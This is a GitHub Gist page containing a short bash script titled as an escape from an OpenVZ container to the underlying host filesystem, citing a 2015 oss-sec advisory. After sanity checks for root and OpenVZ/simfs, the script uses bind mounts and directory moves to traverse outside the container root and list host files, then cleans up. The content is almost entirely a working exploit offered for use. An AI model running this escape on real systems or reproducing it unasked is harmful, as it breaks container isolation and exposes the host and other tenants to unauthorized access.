Last active
October 28, 2018 21:19
-
-
Save mak/b6cd5d3ac321a6ea4649 to your computer and use it in GitHub Desktop.
escape from openvz container to underlying fs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
### for ref goto: http://seclists.org/oss-sec/2015/q2/38 | |
## sanity checks | |
if (( $(id -u) )); then echo '[-] need root'; exit; fi | |
if [ ! -e /proc/vz ]; then echo '[-] this is not openvz based'; exit; fi | |
if [ ! -e /dev/simfs ]; then echo '[-] no smifs cant exploit'; exit; fi | |
a=$(mktemp -d /bind_XXXXXXX) | |
b=$(mktemp -d /bind_XXXXXXX) | |
c=$(mktemp -d /bind_XXXXXXX) | |
cd / | |
mv ${b} ${a}/ | |
mount -o bind $a $c | |
cd /${c}/${b} | |
mv /${a}/${b} / | |
ls -latr ../../../../../ | |
sleep 1 | |
cd ${HOME} | |
umount /${c} | |
rmdir /${a} /${b} /${c} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment